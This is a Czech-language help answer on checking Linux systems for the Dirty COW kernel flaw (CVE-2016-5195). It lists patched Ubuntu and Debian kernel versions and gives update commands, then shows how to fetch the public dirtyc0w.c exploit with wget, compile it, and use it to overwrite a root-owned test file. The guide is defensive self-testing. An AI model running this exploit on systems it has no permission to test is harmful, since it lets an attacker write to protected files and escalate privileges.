Můžete to udělat uname -rv
zjistit verzi vašeho linuxového jádra. Získáte výstup podobný níže:
4.4.0-42-generic #62-Ubuntu SMP Fri Oct 7 23:11:45 UTC 2016
Pokud je vaše verze starší než následující, týká se vás to:
-
4.8.0-26.28 pro Ubuntu 16.10
-
4.4.0-45.66 pro Ubuntu 16.04 LTS
-
3.13.0-100.147 pro Ubuntu 14.04 LTS
-
3.2.0-113.155 pro Ubuntu 12.04 LTS
-
3.16.36-1+deb8u2 pro Debian 8
-
3.2.82-1 pro Debian 7
-
4.7.8-1 pro Debian unstable
Podle security-tracker.debian musíte spustit uname -a
a ověřte vaši aktuální verzi jádra .
wheezy 3.2.78-1 vulnerable
wheezy (security) 3.2.82-1 fixed
jessie 3.16.36-1+deb8u1 vulnerable
jessie (security) 3.16.36-1+deb8u2 fixed
stretch, sid 4.7.8-1 fixed
Tato chyba zabezpečení je opravena v rámci debianu aktualizací vašeho systému:
apt-get update
apt-get upgrade
apt-get dist-upgrade
Upravit
Jak se ujistit, že můj operační systém není ovlivněn CVE-2016-5195?
Můžete vyzkoušet následující tutoriál.
Stáhněte si exploit.
wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
Jako root:Vytvořte foo
soubor:
su
echo this is not a test > foo
Jako uživatel :
gcc -lpthread dirtyc0w.c -o dirtyc0w
gcc -pthread dirtyc0w.c -o dirtyc0w
./dirtyc0w foo m00000000000000000
Ověřte svůj soubor:
cat foo
Na zranitelném počítači získáte m00000000000000000
jako výstup.